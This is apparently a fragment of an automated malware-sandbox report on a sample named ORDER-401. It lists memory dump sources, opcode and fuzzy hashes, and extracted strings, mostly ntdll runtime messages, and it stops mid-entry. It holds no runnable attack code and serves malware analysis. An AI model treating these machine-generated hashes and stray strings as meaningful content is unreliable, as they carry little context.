                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e2370e331185746ef91c833872e5ccc741512abe642b8006b8747d9fb02badd
                                                                    • Instruction ID: c8456d2bad787e51995377837224e7d2d1b84cd8a53a9cf493e0d93e7e2eced3
                                                                    • Opcode Fuzzy Hash: 3e2370e331185746ef91c833872e5ccc741512abe642b8006b8747d9fb02badd
                                                                    • Instruction Fuzzy Hash: 7690027120140802D640715844047460045A7D1311F59C411A5068954EC69D8ED5676A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9f24fd9679997b0e42bc97d4948da932b15baeebbb1298723ea1cce918bdd59
                                                                    • Instruction ID: 7f585a9e3d178b56a82a292ba8ada48490ac16066338e41b31b6eafcc0d13a56
                                                                    • Opcode Fuzzy Hash: e9f24fd9679997b0e42bc97d4948da932b15baeebbb1298723ea1cce918bdd59
                                                                    • Instruction Fuzzy Hash: 0790022120184842D64072584804B0F4145A7E2212F99C419A415A954CC95989555726
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3df13fefac9678256305716603fbf63dfb2ffdb538e016bcd859f3ba3098b1c2
                                                                    • Instruction ID: 5d5a963e54a80a769dc91fea45750a28d409f6e2a19d4da17bcf896795d856ef
                                                                    • Opcode Fuzzy Hash: 3df13fefac9678256305716603fbf63dfb2ffdb538e016bcd859f3ba3098b1c2
                                                                    • Instruction Fuzzy Hash: F090022124140C02D640715884147070046E7D1611F59C411A0028954DC65A8A6567B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4ea85d0c977e4a2ffcf4f55d39585b13a423083a2f84bbe7c82ecbc325f83be0
                                                                    • Instruction ID: f43af17da12dd55f4ab09a052a849b5c62f8889206bd24265b6dd3bae82d8a96
                                                                    • Opcode Fuzzy Hash: 4ea85d0c977e4a2ffcf4f55d39585b13a423083a2f84bbe7c82ecbc325f83be0
                                                                    • Instruction Fuzzy Hash: 4B90022124545502D650715C44046164045B7E1211F59C421A0818994DC59989556326
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4877f92b75eb98bce127c37f08c57be7d4383a381d969874fa6d10b420465c7a
                                                                    • Instruction ID: 2484c7abfec343591865f906021ecaf365efea099b39ec3b1c189c3f930d4cc4
                                                                    • Opcode Fuzzy Hash: 4877f92b75eb98bce127c37f08c57be7d4383a381d969874fa6d10b420465c7a
                                                                    • Instruction Fuzzy Hash: 1490023520140802DA10715858046460086A7D1311F59D811A0428958DC69889A1A226
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d80d8da1d6f1a4db82a183e2d63f7ac19e81db043a634cc59a5a40960f160c98
                                                                    • Instruction ID: 36efb75cfa1e479c7121caec5fb3cf3d224651a7167089c435db7fa8ff94d031
                                                                    • Opcode Fuzzy Hash: d80d8da1d6f1a4db82a183e2d63f7ac19e81db043a634cc59a5a40960f160c98
                                                                    • Instruction Fuzzy Hash: 76900231202405429A4072585804A4E4145A7E2312B99D815A0019954CC95889615326
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: da4c7e704f53f105093408e0bfff6901c7f463c38645ef6a09fcd1767dd254b3
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: f9f91821b0945cc383ab9a5feee4cf3ba57f6a1e069ef9ff1234a6091f8f641d
                                                                    • Instruction ID: 560ddc4157fa3e951fe53bbb1d7d1c5df53bd5f50ffc9865290bd97a343572ae
                                                                    • Opcode Fuzzy Hash: f9f91821b0945cc383ab9a5feee4cf3ba57f6a1e069ef9ff1234a6091f8f641d
                                                                    • Instruction Fuzzy Hash: 7C51E7B1A00216BFDF11EB9D888097EFBF8BB49240B508669F465EB641D334DE50CBA0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 62da2dc82bf7649585166077d45a8097b75f0ddcd68b261bfa8fa37b41d3f2e6
                                                                    • Instruction ID: 8102a48dacbb8cda2b67cc4477067503fc6b755a130ad1e583b375e2a6cd9493
                                                                    • Opcode Fuzzy Hash: 62da2dc82bf7649585166077d45a8097b75f0ddcd68b261bfa8fa37b41d3f2e6
                                                                    • Instruction Fuzzy Hash: 5951F7B5A00646AFCB30DF9DC89497FBBF8FB84200F04885DE696CF641E6B4DA408760
                                                                    Strings
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015B4725
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015B4742
                                                                    • ExecuteOptions, xrefs: 015B46A0
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015B46FC
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015B4655
                                                                    • Execute=1, xrefs: 015B4713
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 015B4787
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: acfba84301da1a9d93526fc8ddfceaa0d9aeef425bd6e2b3be99e232fbff8a64
                                                                    • Instruction ID: 95cdcef3426fb5201973140c35edb88ca6623f738079059aad9acc9acb6fada9
                                                                    • Opcode Fuzzy Hash: acfba84301da1a9d93526fc8ddfceaa0d9aeef425bd6e2b3be99e232fbff8a64
                                                                    • Instruction Fuzzy Hash: EE51FD3160021A7AEF21AEA8FC8AFEE77A9BF59704F0404A9D505AF181D7719A45CF50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction ID: f041168cacb42bb34523634a303c153515c4900980cb196e9c4243e72d430434
                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction Fuzzy Hash: 4681E070E1124A8EEF25BE6CC8917FEBBB9BF45320F184619D861BF291C73498408B51
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    • Opcode ID: 8ed2d63b5823b61fccda82c1bc43e65eb250aff6c4ae293b585f8cfc359736ad
                                                                    • Instruction ID: d5dadecee8362e8dcbdf79556917534433d78627f45f7eb56bac784746694206
                                                                    • Opcode Fuzzy Hash: 8ed2d63b5823b61fccda82c1bc43e65eb250aff6c4ae293b585f8cfc359736ad
                                                                    • Instruction Fuzzy Hash: 6C2165BAA0011AABDB11DF79CC40EEF7BF9FF54640F44011AEA05EB240E730DA018BA5
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 015B031E
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015B02BD
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015B02E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: 3c3b4ca372b82fc48f2a22a961cb0dcebf1348ca08ad299a637f629c6b756eaa
                                                                    • Instruction ID: a674e4fb0bc523ed967d8f8c0b71c0d0f4af3b773f92901ec1bd7f946d6c93fa
                                                                    • Opcode Fuzzy Hash: 3c3b4ca372b82fc48f2a22a961cb0dcebf1348ca08ad299a637f629c6b756eaa
                                                                    • Instruction Fuzzy Hash: 1BE1BE30A087429FE725CF28D894B6ABBE4BB84314F140A5EF5A58F2E1D774D945CB82
                                                                    Strings
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 015B7B7F
                                                                    • RTL: Re-Waiting, xrefs: 015B7BAC
                                                                    • RTL: Resource at %p, xrefs: 015B7B8E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: 8378ea16a9444d1c5708ff42e8681f700dedb36fdf1c59774dd84d10b27085a0
                                                                    • Instruction ID: 6f0a6934d8be24356f530018489a1afd3ddcb48d9655e5a470e8cb6471d877d8
                                                                    • Opcode Fuzzy Hash: 8378ea16a9444d1c5708ff42e8681f700dedb36fdf1c59774dd84d10b27085a0
                                                                    • Instruction Fuzzy Hash: 5B41D1313047039FD720DE29D841B6AB7E5FF89B10F000A1DE966DF280EB72E5058B91
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B728C
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 015B72C1
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015B7294
                                                                    • RTL: Resource at %p, xrefs: 015B72A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: dda452983faa896c13a732d123bc374b3ceff7c0dd35e263b1daa6cfc4fae61c
                                                                    • Instruction ID: 9a9cbc6ac72bcec2bb6bfe458a9f45bbbbbacbd4580b7df5b96fdf1c73e1ddff
                                                                    • Opcode Fuzzy Hash: dda452983faa896c13a732d123bc374b3ceff7c0dd35e263b1daa6cfc4fae61c
                                                                    • Instruction Fuzzy Hash: 6141D231600207AFD721DE69CC82FAAB7E6FB99710F140619F955EF280DB31E84287D1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 5fc903e709bb08d993a2499c57e350d026b9d14cd4bf531d2fc0e43b1551afe1
                                                                    • Instruction ID: 4539a4a9f5300f54ac530a4c949458a699031029d7179cfc0662cda0866ab074
                                                                    • Opcode Fuzzy Hash: 5fc903e709bb08d993a2499c57e350d026b9d14cd4bf531d2fc0e43b1551afe1
                                                                    • Instruction Fuzzy Hash: D23178B2A006199FDB60DF2DCC40BEEB7F8FF54610F444559E949E7240EB30DA448BA0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction ID: 2d6b0472367d2518f4dd597210019a50586eaade0aba5d804c3817dfb1f2dff8
                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction Fuzzy Hash: 3D918471E002169EEB24FF6DC8816BEBBA5FF88720F64451AE965FF2C0D73099418751
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: 0fded06efbf40016d11d947e523caac0eeb3eb89edfc60270b32ef7119abe39e
                                                                    • Instruction ID: a0e168fdcb4b4ef6e7936fcfdf9e022ac020d06ef37f47588903b001a3f5765c
                                                                    • Opcode Fuzzy Hash: 0fded06efbf40016d11d947e523caac0eeb3eb89edfc60270b32ef7119abe39e
                                                                    • Instruction Fuzzy Hash: F8811D71D4126A9BDB31CB54CC45BEEB7B4BF48754F0041EAAA19BB240D7705E84CFA0
                                                                    APIs
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 015CCFBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8
                                                                    • String ID: @$@4Qw@4Qw
                                                                    • API String ID: 4062629308-2383119779
                                                                    • Opcode ID: 6b28a03d69c8c19ff0878eedd35d8d618a0af7f84c7806ef58ce8bf05ef82bd5
                                                                    • Instruction ID: 205563853f83baf8a6da2d7e682fb221b8b60fd8e88e9ced83b293b1e835c721
                                                                    • Opcode Fuzzy Hash: 6b28a03d69c8c19ff0878eedd35d8d618a0af7f84c7806ef58ce8bf05ef82bd5
                                                                    • Instruction Fuzzy Hash: 5D414971900216DFDB21AFE9C840AAEBBB8FF95B50F00442EE915EF254E734D941CBA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$ B$#$%y$19$2$>$D$E$GP$K_$PP$Qt$V$`J$c6$f$m$o$v>$x$}$,$>$_
                                                                    • API String ID: 0-1984175023
                                                                    • Opcode ID: 15635339f0c4b65a3d3d39204c601abd77c9bd04931a466fced5cd5a72c5aebe
                                                                    • Instruction ID: 1550b7dbd848911bceabc9bdad2ff401c9c2423f0f709b39d736918b9e9c40f6
                                                                    • Opcode Fuzzy Hash: 15635339f0c4b65a3d3d39204c601abd77c9bd04931a466fced5cd5a72c5aebe
                                                                    • Instruction Fuzzy Hash: 0D42ADB0E0526DCBEB68CF04C895BDDBBB2BB44308F1081D9D5496B290DBB56AC5DF81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$O$S$\$s
                                                                    • API String ID: 0-3854637164
                                                                    • Opcode ID: 74f2a845a8c98f1cbd2e33735c6ec5c448920ce1012c5b9301475194a65474ab
                                                                    • Instruction ID: a6520c564590fbfd582fd2cae62102ffd3c0632b01846d80e4ef5cfbd72b84f3
                                                                    • Opcode Fuzzy Hash: 74f2a845a8c98f1cbd2e33735c6ec5c448920ce1012c5b9301475194a65474ab
                                                                    • Instruction Fuzzy Hash: 4E5195B2D00119ABDB10EFD4DD49EEFF3B8EF44719F044199E9086B140E7756A4A8BA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: yi
                                                                    • API String ID: 0-2336885180
                                                                    • Opcode ID: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                                    • Instruction ID: 2cd3499c83b7b3c3f30cef7a06e8ae91b4ae34d107127802821e7bcda55e6e4f
                                                                    • Opcode Fuzzy Hash: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                                    • Instruction Fuzzy Hash: 6E21FEB6D01219AF9B00DFE9D8408EFB7F9EF88310F04456AE919E7200E7716A058BA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe2754626f8af1bbdcf6b223d733a6facd9102d29d1880a7fd82e0560f6a1c56
                                                                    • Instruction ID: f8f5c938ed042e69177a440a2b4bdd3d4e0d8f535adb7ecb33013a76b01d3d7a
                                                                    • Opcode Fuzzy Hash: fe2754626f8af1bbdcf6b223d733a6facd9102d29d1880a7fd82e0560f6a1c56
                                                                    • Instruction Fuzzy Hash: 5941FEB1D11218AFDB14DF99CC81AEEBBBCEF49710F10455AF918E7240E7B1A641CBA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f413d01f484df2d047b2e8d45919c4bb039abd2104dac6aa64f115fee20feb2e
                                                                    • Instruction ID: 6360129594d36ef73509c73303c8c629efaa9fa4e9de4618d84ef3adc4da3bbd
                                                                    • Opcode Fuzzy Hash: f413d01f484df2d047b2e8d45919c4bb039abd2104dac6aa64f115fee20feb2e
                                                                    • Instruction Fuzzy Hash: 5831F8B5A00248ABDB14DF99CC81EEFB7F9EF88704F108119F909A7340E774A911CBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 218d563c39c0a71cd3337df9d9d62a9197f35fc4b4fe87b00bf36fddaed69bb2
                                                                    • Instruction ID: d8dc43dc0d1a2cb9de16b5d90b2545a29dbbe780650f8a7bf5cbfbb93f0fcff2
                                                                    • Opcode Fuzzy Hash: 218d563c39c0a71cd3337df9d9d62a9197f35fc4b4fe87b00bf36fddaed69bb2
                                                                    • Instruction Fuzzy Hash: E42119B1A04349AFEB14DF98CC81EAFB7B8EF88710F104109F909AB240D774B911CBA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 963cbaa09def02e4d1eb9250690dfd1d3dff3227b0342066ff4c39344effe0cf
                                                                    • Instruction ID: f9a0ff2ffb061625e25e72ca3c1b45ad594b39ca1e436f24e778a1908f2b903e
                                                                    • Opcode Fuzzy Hash: 963cbaa09def02e4d1eb9250690dfd1d3dff3227b0342066ff4c39344effe0cf
                                                                    • Instruction Fuzzy Hash: E31170B27802067AF720AE558C43FAB776CDB85B55F244015FF08AE2C1DAA4F81246B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65140a3b059ee79970d215b499d4bce6e3d18515d929f97248ad41fbe4fefd5c
                                                                    • Instruction ID: 8ff30458c09378137f811746312c8c28ef1febe167dd8d33d763c85ccf684b77
                                                                    • Opcode Fuzzy Hash: 65140a3b059ee79970d215b499d4bce6e3d18515d929f97248ad41fbe4fefd5c
                                                                    • Instruction Fuzzy Hash: B8115E71A05349ABE720EF98CC45FAB77ACEF85715F104509F948AB280EA707912CBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4ead1439963b26653c200fde1fbbf3326f591bd6fe7ccce56ac6fc5d71bfee7
                                                                    • Instruction ID: 612a93f9d475169d2552b5ef1a4e9510557e091046d06fa9d60ebdd381ff003e
                                                                    • Opcode Fuzzy Hash: a4ead1439963b26653c200fde1fbbf3326f591bd6fe7ccce56ac6fc5d71bfee7
                                                                    • Instruction Fuzzy Hash: BA115E71904348BBE710EF98CC45FAB77ACEF85715F104409F9486B280EA747911CBA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b9ff44f630e79ce15d8ce08663523b67a53b04885dae65d290f6903aa3378063
                                                                    • Instruction ID: b2b6af3ce24ff53a0838b39572a207b9671fc327c3d3948a8c58462cdb5af4b6
                                                                    • Opcode Fuzzy Hash: b9ff44f630e79ce15d8ce08663523b67a53b04885dae65d290f6903aa3378063
                                                                    • Instruction Fuzzy Hash: DD1100B6D0121DAF9B00DFE9D8519EEB7F9EF48210F04415AE919E7200E7716A05CBA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                                    • Instruction ID: af523805e0155f855e02f8c9bf7326623ffa9249fed779c3684288d9eb72aaaa
                                                                    • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                                    • Instruction Fuzzy Hash: D2018CB2215508BBDB44DF99DC90EEB77ADEF8C754F508208BA0DE3240D630F9528BA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
